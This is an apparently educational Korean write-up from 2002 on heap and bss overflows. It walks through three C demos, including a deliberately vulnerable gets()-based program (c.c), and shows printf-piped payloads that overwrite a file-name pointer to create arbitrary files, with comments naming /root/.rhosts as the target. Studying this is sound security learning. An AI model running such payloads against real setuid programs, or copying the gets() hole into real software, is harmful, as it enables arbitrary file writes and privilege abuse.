Heap OverFlow 정리-EAM2

/* Anesra 2002-06-09 */

서두:
EAM2에서 oprix님께서 Heap Overflow를 강좌해 주셨는데 그것을 정리하는 의미로써
이렇게 글을 씁니다. Heap overflow에 대한 이해를 도와주신 oprix님께 감사하며
아직 Heap overflow의 개념을 잘 못잡으신 그리고 강좌를 잘 이해 못하신 분들을 위해
이렇게 나마 글을 쓰며 이것을 보며 조금이라도 도움이 되길 바랍니다 .

혹시 실수하거나 틀린부분 있으면 과감히 질문하시거나 답해주시면 감사하겠습니다. 

이글이 메모장에서 작성되었는데 게시판에 뿌리니 메모리 구조부분에서 약간 그림이 안맞습니다. 이것 Ctrl+A 전체복사하셔서 복사한뒤 Ctrl+C한뒤
메모장에 Ctrl+V로 붙여서 보시면 더 잘 볼 수 있을껍니다.


bash-2.05a$ more a.c
/* demonstrates dynamic overflow in heap (initialized data) */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{

char buf[255];
u_long diff;
char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

diff = (u_long)buf2 - (u_long)buf1;
printf("buf = %p buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf, buf1, buf2, di
ff);

memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';

printf("before overflow: buf2 = %s\n", buf2);
memset(buf1, 'B', (u_int)(diff + OVERSIZE));
printf("after overflow: buf2 = %s\n", buf2);

return 0;
}


이 소스는 buf2를 오버플로오 하는 소스이다.
실행해보면
bash-2.05a$ ./a
buf = 0xbffffb40 buf1 = 0x80497f8, buf2 = 0x8049810, diff = 0x18 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA

bash-2.05a$

이런결과가 나온다.
메모리 구조를 도식화해 보자
소스에서 보듯이 buf2를 첨에 BUFSIZE-1만큼 A로 채운후에 
buf1에 'B'라는 문자열을 buf2와 buf1의 차이와 OVERSIZE(8byte)만큼 덥어쓴다



     [      ]
stack[ buf  ] 0xbffffb40 
     [      ]
     [      ]
heap [ buf2 ] 0x08049810
     [      ]
heap [ buf1 ] 0x080497f8
     [      ]

[buf 1           ][dummy][buf 2           ]
[                ][2byte][AAAAAAAAAAAAAAAA]
before

[buf 1           ][dummy][buf 2           ]
[BBBBBBBBBBBBBBBB][BB   ][BBBBBBBBAAAAAAAA]
after 

이런식으로 도식화를 해볼수 있다.
여기서 알 수 있는것은 stack영역과 heap영역은 메모리 주소번지가 다르다는 것이다.
이것을 확인하기 위해서 이 프로세스의 메모리 구조를 살펴보자
소스에 마지막 return 0; 앞에 sleep(3000); 이것을 추가하고 컴파일 하자

메모리 구조를 알아보기 위해서 백그라운드로 실행시키고 프로세스 ID를 확인한다.
bash-2.05a$ ./a &
[3] 12488
bash-2.05a$ buf = 0xbffffb40 buf1 = 0x80497f8, buf2 = 0x8049810, diff = 0x18 byt
es
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA

프로세스 ID랑 메모리 주소를 잘 눈여겨 봐둬라.
메모리 구조를 확인해보기 위해서 
bash-2.05a$ more /proc/12488/maps
08048000-08049000 r-xp 00000000 03:05 1147192    /tmp/heap/.ane/a
08049000-0804a000 rw-p 00000000 03:05 1147192    /tmp/heap/.ane/a
40000000-40013000 r-xp 00000000 03:05 409873     /lib/ld-2.2.5.so
40013000-40014000 rw-p 00013000 03:05 409873     /lib/ld-2.2.5.so
40014000-40015000 rw-p 00000000 00:00 0
42000000-4212c000 r-xp 00000000 03:05 359753     /lib/i686/libc-2.2.5.so
4212c000-42131000 rw-p 0012c000 03:05 359753     /lib/i686/libc-2.2.5.so
42131000-42135000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0

이렇게 하면 된다.
이것을 보면 스택의 메모리 주소와 힙의 메모리 주소를 알수있다.
사용자가 사용할수 있는 메모리 주소의 범위는
0x00000000~ 0xc0000000 까지이고
0xc0000000~ 0xffffffff 는 커널이 사용하는 주소이다.(세고비아님강좌)

즉 저 메모리 구조에서 보면 제일 아래줄에있는
bfffe000-c0000000 rwxp fffff000 00:00 0  이 범위가 스택의 범위이다.
중간에 rwxp는 스택의 퍼미션, 즉 읽고 쓰고 실행할수 있다는 의미이다.

자 이제 눈 여겨 봐 둘 부분은 buf1과 buf2의 주소이다.
buf1(080497f8)과 buf2(08049810)의 주소둘다 저 메모리 구조의 두번째 줄
08049000-0804a000 rw-p 00000000 03:05 1147192    /tmp/heap/.ane/a
여기에 속한다는 것을 알수 있다. 바로 이부분이 HEAP영역의 메모리 주소인 것이다!!

자 이제 stack과 heap의 메모리 구조와 주소를 알았고 heap에서도 overflow가 일어날수 
있다는 것을 알았다.

a.c의 내용은 인접한 메모리의 주소를 덮어 쓸수 있다는 것을 알수 있다!!!


bash-2.05a$ more b.c
/* demonstrates static pointer overflow in bss (uninitialized data) */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define BUFSIZE 16
#define ADDRLEN 4 /* # of bytes in an address */

int main()
{

u_long diff;
static char buf[BUFSIZE], *bufptr;
bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr,
buf, diff, diff);
memset(buf, 'A', (u_int)(diff + ADDRLEN));

printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr,
buf, diff, diff);

return 0;
}


b.c를 컴파일 하고 실행시켜보자. a.c와 마찬가지로 return 0; 바로 위에 sleep값을 주고
각 변수들이 메모리 어디에 위치하는지 보자.

bash-2.05a$ ./b &
[1] 12557
bash-2.05a$ bufptr (0x804971c) = 0x804970c, buf = 0x804970c, diff = 0x10 (16) by
tes
bufptr (0x804971c) = 0x41414141, buf = 0x804970c, diff = 0x10 (16) bytes

이것을 보면 알수 있듯이 buf의 주소에 있는 값을 바꾼것이다.
이것또한 쉽게 이해하기 위해서 메모리를 도식화 해보자.

heap     [0x804970c] 0x804871c - bufptr
heap     [ buf     ] 0x804970c - buf  

buf             bufptr
[16byte          ][0x804970c]    
before
buf             bufptr
[AAAAAAAAAAAAAAAA][AAAA]
after

이렇게 오버라이트 되어서 bufptr의 주소가 0x41414141 (ASCII A의 값은 41)이렇게
바뀌었음을 볼수 있다. 얼마나 놀라운 결과인가!
이것은 우리가 메모리의 다른 영역또한 가리킬수 있다는 것을 의미한다!!

이제 우리는 bufptr의 주소를 조작해서 재미있는것?들을 할 수 있다는 것이다!

자 재확인을 위해서 /prpc/ID/maps를 살펴보자

bash-2.05a$ more /proc/12557/maps
08048000-08049000 r-xp 00000000 03:05 1147250    /tmp/heap/.ane/b
08049000-0804a000 rw-p 00000000 03:05 1147250    /tmp/heap/.ane/b
40000000-40013000 r-xp 00000000 03:05 409873     /lib/ld-2.2.5.so
40013000-40014000 rw-p 00013000 03:05 409873     /lib/ld-2.2.5.so
40014000-40015000 rw-p 00000000 00:00 0
42000000-4212c000 r-xp 00000000 03:05 359753     /lib/i686/libc-2.2.5.so
4212c000-42131000 rw-p 0012c000 03:05 359753     /lib/i686/libc-2.2.5.so
42131000-42135000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0

stack의 위치와 변수가 들어간 heap의 위치를 알수 있다. 


자 그럼 이제 실제로 포인터의 내용을 바꿔서 무엇을 할수 있을까.
그것을 알아보는 예로 c.c를 보자

bash-2.05a$ more c.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

/*
* Run this vulprog as root or change the "vulfile" to something else.
* Otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/

int main(int argc, char **argv) {

FILE *tmpfd;
char buf[BUFSIZE], *tmpfile;

if (argc <= 1) {

fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
exit(ERROR);
}

tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
printf("before: tmpfile = %s\n", tmpfile);
printf("argv[1] addr %p\n", argv[1]);

printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);

printf("\nafter: tmpfile = %p\n", tmpfile);
fflush( stdout);
tmpfd = fopen(tmpfile, "w");

if (tmpfd == NULL) {
fprintf(stderr, "error opening %s: %s\n", tmpfile,
strerror(errno));
exit(ERROR);
}

fputs(buf, tmpfd);
fclose(tmpfd);

}

이 소스를 잘 살펴보면
파일을 가리키는 포인터(*tmpfd)가 있고, 파일에 값을 쓸수 있게 buf가 있다.
그리고 파일을 생성하는 포인트(*tmpfile) 이 있다.

우선 실행해보자.
bash-2.05a$ ./c
Usage: ./c <garbage>
bash-2.05a$ ./c abcd
before: tmpfile = /tmp/vulprog.tmp
argv[1] addr 0xbffffdb3
Enter one line of data to put in /tmp/vulprog.tmp: Happy Heap OverFlow!

after: tmpfile = 0x8048855
bash-2.05a$

보면 알다시피 before는 tmpfile이 생성되는 경로를 보여준다.
그리고 우리가 argv[1]로 입력한 abcd가 들어가는 메모리의 주소를 보여주고
생성되는 파일에 들어가는 데이터를 입력받고
그 생성되는 파일의 주소를 보여주는 프로그램이다.

bash-2.05a$ more /tmp/vulprog.tmp
Happy Heap OverFlow!
bash-2.05a$

우리가 입력한 데이터가 들어가는 것을 확인해볼수 있다.

이것또한 이해를 쉽게 하기 위해서 메모리를 도식화 해보자.

     [argv[1] ] = 0xbffffdb3 
     [*tmpfd  ]
     [ buf    ] =  16 byte
     [*tmpfile] = "/tmp/vulprog.tmp" = 0x8048855

자 이제 overflow를 시켜보자.

bash-2.05a$ ./c abcd
before: tmpfile = /tmp/vulprog.tmp
argv[1] addr 0xbffffdb3
Enter one line of data to put in /tmp/vulprog.tmp: 12345678901234567890

after: tmpfile = 0x30393837
Segmentation fault
bash-2.05a$

오케! 세그먼트폴트가 일어났다. tmpfile의 주소에서 볼수있듯이
우리가 입력한 값이 포인터의 주소를 바꿔치기 한것이다!!
자 변화된 값을 유심히 살펴보자
0x30393837은 우리가 입력한 0 9 8 7 이다 즉 buf에 16바이트를 집어넣고
그 뒤에 입력된 4자리의 숫자가 들어간것이다!

자 이해를 더 쉽게 하기 위해서 메모리를 도식화 해본다.

[argv[1] ] [ *tmpfd ] [ buf  ] [ tmpfile  ]
                     [16byte] [0x08048855]
우리는 여기서 buf에 값을 입력해서 tmpfile까지 바꿔버릴수 있었다.
[argv[1] ] [ *tmpfd ] [123~  ] [0x30393837]


자 위에 프로그램 소스는 포인터가 어떤 파일을 생성하고 있는걸 알수있고
우리가 그 파일이름을 제어할수 있다는 것도 알수있다.

이제 우리가 원하는 주소를 넣어보자

bash-2.05a$ (printf "1234567890123456\xef\xbe\xad\xde")|./c abcd
before: tmpfile = /tmp/vulprog.tmp
argv[1] addr 0xbffffdb3
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = 0xdeadbeef
Segmentation fault

이경우는 0xdeadbeef가 실행불가능한 영역을 가리키기 때문에 세그먼트 폴트가 일어난것이다.
스택의 주소를 보면 쉽게 이해할수 있을것이다.

bash-2.05a$ (printf "1234567890123456\xfb\xf0\xff\xbf")|./c abcd
before: tmpfile = /tmp/vulprog.tmp
argv[1] addr 0xbffffdb3
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = 0xbffff0fb
error opening : No such file or directory
bash-2.05a$

이경우는 0xbffff0fb를 가리키고 있는데 이 가리키고 있는 곳에 
파일이름이 없기 때문에 저런 에러를 나타내는 것이다.


이제 우리가 가리키는 파일이름을 바꿔보자

tmpfile이 가리키는 부분을 argv[1]의 메모리 번지로 바꿔버리면
우리가 만들고자 하는 파일이 현재디렉토리에 생성된다.
우선 눈으로 한번 보자

bash-2.05a$ ./c abcd
before: tmpfile = /tmp/vulprog.tmp
argv[1] addr 0xbffffdb3
Enter one line of data to put in /tmp/vulprog.tmp:

after: tmpfile = 0x8048855

자 보면 argv[1]의 주소는 0xbfffdb3임을 알수 있다.
이제 이곳을 tmpfile이 가리키게 만들고 argv[1]에는우리가 만들고자 하는 파일을 입력해보자

bash-2.05a$ (printf "1234567890123456\xb3\xfd\xff\xbf")|./c Happy
before: tmpfile = /tmp/vulprog.tmp
argv[1] addr 0xbffffdb2
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = 0xbffffdb3

중간에 주소가 한번 바뀐것을 볼수있다.-_-;;
bash-2.05a$ ls -al
합계 108
-rw-r--r--    1 level0   level          20  6월  9 11:36 ????終?외????
drwxr-xr-x    2 level0   level        4096  6월  9 12:45 .
drwxr-xr-x   18 level0   level        4096  6월  9 00:10 ..
-rw-r--r--    1 level0   level          16  6월  8 23:43 U??SR?
-rwxr-xr-x    1 level0   level       14137  6월  8 23:14 a
-rwxr--r--    1 level0   level         674  6월  8 23:14 a.c
-rw-r--r--    1 level0   level          20  6월  9 12:45 appy
-rwxr-xr-x    1 level0   level       13954  6월  8 23:24 b
-rwxr--r--    1 level0   level         619  6월  8 23:24 b.c
-rwxr-xr-x    1 level0   level       15097  6월  9 12:33 c
-rwxr--r--    1 level0   level         957  6월  9 12:33 c.c
-rwxr--r--    1 root     root         1142  6월  8 22:59 d.c
-rwxr-xr-x    1 level0   level       15161  6월  8 23:58 e
-rw-r--r--    1 level0   level        1034  6월  8 23:58 e.c
-rw-r--r--    1 level0   level         674  6월  9 11:58 ~

역시 중간에 주소가 한칸 밀렸기 때문에 H가 안나왔음을 알수있다.
다시 한번 시도해보자.

bash-2.05a$ (printf "1234567890123456\xb2\xfd\xff\xbf")|./c Happy
before: tmpfile = /tmp/vulprog.tmp
argv[1] addr 0xbffffdb2
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = 0xbffffdb2
bash-2.05a$ ls -al
합계 112
-rw-r--r--    1 level0   level          20  6월  9 11:36 ????終?외????
drwxr-xr-x    2 level0   level        4096  6월  9 12:47 .
drwxr-xr-x   18 level0   level        4096  6월  9 00:10 ..
-rw-r--r--    1 level0   level          20  6월  9 12:47 Happy
-rw-r--r--    1 level0   level          16  6월  8 23:43 U??SR?
-rwxr-xr-x    1 level0   level       14137  6월  8 23:14 a
-rwxr--r--    1 level0   level         674  6월  8 23:14 a.c
-rw-r--r--    1 level0   level          20  6월  9 12:45 appy
-rwxr-xr-x    1 level0   level       13954  6월  8 23:24 b
-rwxr--r--    1 level0   level         619  6월  8 23:24 b.c
-rwxr-xr-x    1 level0   level       15097  6월  9 12:33 c
-rwxr--r--    1 level0   level         957  6월  9 12:33 c.c
-rwxr--r--    1 root     root         1142  6월  8 22:59 d.c
-rwxr-xr-x    1 level0   level       15161  6월  8 23:58 e
-rw-r--r--    1 level0   level        1034  6월  8 23:58 e.c
-rw-r--r--    1 level0   level         674  6월  9 11:58 ~

오케!! 이제 일치한다. 그리고 리스트를 보면 Happy란 파일이 생성되었음을 볼수있다!!

bash-2.05a$ more Happy
1234567890123456끗�
bash-2.05a$

Happy의 내용을 보면 우리가 입력한 buf의 내용이 들어가 있음을 확인해볼수있다.

여기까지 강의한 내용입니다.


후두? :
이것을 하게 되면서 저 스스로 다시 한번 개념을 잡을 수 있게 되었고
다른 사람들이 이것을 보면서 도움이 되었으면 좋겠다고 생각합니다.
워낙 글 솜씨가 없어서 이렇게 횡설수설 하는것을 이해해주시고(이럴때면
AmesianX형의 장황한 글솜씨가 부럽음..) 다들 열심히 하시니깐 참 좋습니다.
그럼 다들 끝까지 남으셔서 오프라인에서 한번 볼수 있기를 바라겠습니다:)  


P.S 글체가 반말로 한걸 양해해주십시요. 그게 글쓰기 편하기 때문입니다:)